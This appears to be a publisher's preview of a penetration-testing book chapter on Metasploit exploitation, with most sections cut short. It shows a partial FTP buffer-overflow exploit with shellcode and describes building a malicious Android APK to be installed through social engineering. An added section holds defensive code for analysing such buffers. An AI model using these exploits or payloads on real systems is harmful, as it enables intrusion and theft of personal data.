You're reading from Metasploit Bootcamp

Product type: Book
Published in: May 2017
ISBN-13: 9781788297134
Edition: 1st Edition
Author: Nipun Jaswal

Nipun Jaswal is an international cybersecurity author and an award-winning IT security researcher with more than a decade of experience in penetration testing, Red Team assessments, vulnerability research, RF, and wireless hacking. He is presently the Director of Cybersecurity Practices at BDO India. Nipun has trained and worked with multiple law enforcement agencies on vulnerability research and exploit development. He has also authored numerous articles and exploits that can be found on popular security databases, such as PacketStorm and exploit-db. Please feel free to contact him at @nipunjaswal.
Chapter 3. Exploitation and Gaining Access

In Chapter 2, Identifying and Scanning Targets, we took a close look at scanning multiple services in a network while fingerprinting their exact version numbers. We had to find the exact version numbers of the running services so that we could exploit the vulnerabilities residing in a particular version of the software. In this chapter, we will make use of the strategies learned in Chapter 2, Identifying and Scanning Targets, to successfully gain access to some systems by taking advantage of their vulnerabilities. We will learn how to do the following:

  • Exploit applications using Metasploit
  • Test servers for successful exploitation
  • Attack mobile platforms with Metasploit
  • Use browser-based attacks for client-side testing
  • Build and modify existing exploit modules in Metasploit

So let us get started.

Setting up the practice environment

Throughout this chapter and the following ones, we will primarily practice on Metasploitable 2 and Metasploitable 3 (intentionally vulnerable operating systems). Additionally, for the exercises that are not covered by the Metasploitable distributions, we will use our customized environment:

Exploiting applications with Metasploit

Consider yourself performing a penetration test on a class B IP range. Let's first add a new workspace for our test and switch to it, as shown in the following screenshot:

We added a new workspace by issuing the workspace command with the -a switch followed by the name of the new workspace. We then switched to the workspace we had just created by issuing the workspace command again followed by the workspace name, which in our case is ClassBNetwork.

Throughout Chapter 2, Identifying and Scanning Targets, we used the TCP portscan auxiliary module heavily. Let's use it again and see what surprises this network has for us:

Nothing fancy! We have only two open ports, port 80 and port 22. Let's verify the information found in the scan by issuing the hosts command and the services command, as shown in the following screenshot:

We can see that the information captured in the scan now resides in Metasploit's database. However, we...

Exploiting browsers for fun and profit

Web browsers are used primarily for surfing the Web. However, an outdated web browser can lead to the compromise of the entire system. Users may never use the preinstalled web browser and instead choose one based on their preference. However, the default preinstalled web browser can still expose the system to various attacks. Exploiting a browser by finding vulnerabilities in its components is known as browser-based exploitation.

For more information on Firefox vulnerabilities, refer to http://www.cvedetails.com/product/3264/Mozilla-Firefox.html?vendor_id=452.

For Internet Explorer vulnerabilities, refer to http://www.cvedetails.com/product/9900/Microsoft-Internet-Explorer.html?vendor_id=26.

The browser autopwn attack

Metasploit offers browser autopwn, an automated attack module that tests various browsers for weaknesses and exploits them. To understand the inner workings of this module, let us discuss the technology behind the attack.

The technology...

Attacking Android with Metasploit

The Android platform can be attacked either by creating a simple APK file or by injecting the payload into an actual APK. We will cover the first approach. Let us get started by generating an APK file with msfvenom as follows:

Once the APK file is generated, all we need to do is either convince the victim (through social engineering) to install the APK or gain physical access to the phone. Let us see what happens on the phone as soon as a victim downloads the malicious APK:

Once the download is complete, the user installs the file as follows:

Most people never notice what permissions an app asks for. Hence, an attacker gains full access to the phone and steals personal data. The preceding screen lists the permissions the application requires in order to operate. Once the installation completes successfully, the attacker gains meterpreter access to the target phone as follows:

Whooaaa! We got meterpreter access easily. Post-exploitation is widely covered...

Converting exploits to Metasploit

In the upcoming example, we will see how we can import an exploit written in Python into Metasploit. The publicly available exploit can be downloaded from https://www.exploit-db.com/exploits/31255/. Let us analyze the exploit as follows:

import socket as s
from sys import argv
host = "127.0.0.1"
fuser = "anonymous"                 # FTP credentials used to log in before sending the buffer
fpass = "anonymous"
junk = '\x41' * 2008                # padding that fills the buffer up to the saved return address
espaddress = '\x72\x93\xab\x71'     # 4 bytes that overwrite the return address (little-endian)
nops = '\x90' * 10                  # short NOP sled placed before the shellcode
shellcode = ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46...
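Before an exploit like the one above is ported, an analyst usually confirms its layout (filler, overwritten return address, NOP sled, shellcode) from a captured buffer. The following is an added example, not code from the book or from the exploit-db entry: it dissects a buffer of that layout and flags FTP commands that carry one. The sample bytes, the dissect_overflow and is_suspicious_ftp_command names and the 256-byte argument threshold are constructed here; INT3 bytes stand in for shellcode.

```python
# Added example (not from the book): dissect a captured overflow buffer laid out
# like the exploit above (filler + return address + NOP sled + shellcode) and flag
# FTP commands that carry one. Sample bytes are constructed here from the book's
# constants, with INT3 (0xCC) placeholders standing in for the real shellcode.

FILLER = 0x41  # 'A', the padding byte the exploit uses
NOP = 0x90


def dissect_overflow(payload: bytes, filler: int = FILLER, nop: int = NOP) -> dict:
    """Return the filler length, the 4-byte return address (raw and as a
    little-endian integer), the NOP count and the trailing shellcode length."""
    junk_len = 0
    while junk_len < len(payload) and payload[junk_len] == filler:
        junk_len += 1
    if junk_len == 0 or junk_len + 4 > len(payload):
        raise ValueError("no filler run followed by a 4-byte return address")
    ret = payload[junk_len:junk_len + 4]
    pos = junk_len + 4
    nop_count = 0
    while pos < len(payload) and payload[pos] == nop:
        nop_count += 1
        pos += 1
    return {
        "junk_len": junk_len,
        "ret_addr": ret,
        "ret_addr_int": int.from_bytes(ret, "little"),
        "nop_count": nop_count,
        "shellcode_len": len(payload) - pos,
    }


def is_suspicious_ftp_command(line: bytes, max_arg_len: int = 256) -> bool:
    """Flag an FTP command whose argument is implausibly long or holds a NOP sled;
    max_arg_len is an assumed threshold, tune it to the server's real limits."""
    _verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return len(arg) > max_arg_len or (b"\x90" * 8) in arg


# Constructed sample: the book's 2008-byte padding and return address, a 10-byte
# sled, and 32 bytes of INT3 in place of shellcode.
SAMPLE_PAYLOAD = b"\x41" * 2008 + b"\x72\x93\xab\x71" + b"\x90" * 10 + b"\xcc" * 32

if __name__ == "__main__":
    print(dissect_overflow(SAMPLE_PAYLOAD))
    print(is_suspicious_ftp_command(b"USER " + SAMPLE_PAYLOAD + b"\r\n"))
    print(is_suspicious_ftp_command(b"USER anonymous\r\n"))
```

The ret_addr_int value read back from the sample is the little-endian interpretation of the four bytes the exploit places after its padding, which is what you would look up when checking which module the overwritten return address points into.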

Summary and exercises

Well, you learned a lot in this chapter, and you will have to research a lot before moving on to the next chapters. We covered various types of applications in this chapter and successfully managed to exploit them as well. We saw how db_nmap stores results in the database, which helps us segregate the data. We saw how vulnerable applications such as Desktop Central 9 could be exploited. We also covered applications that were tough to exploit, where gaining access to their credentials led to obtaining system-level access. We saw how we could exploit an FTP service and gain better control with extended features. Next, we saw how vulnerable browsers and malicious Android applications could lead to the compromise of the system through client-side exploitation. Finally, we looked at how we can convert an exploit into a Metasploit-compatible one.

This was a fast-paced chapter; to keep up to speed, you must research and hone your skills in exploit research, various...
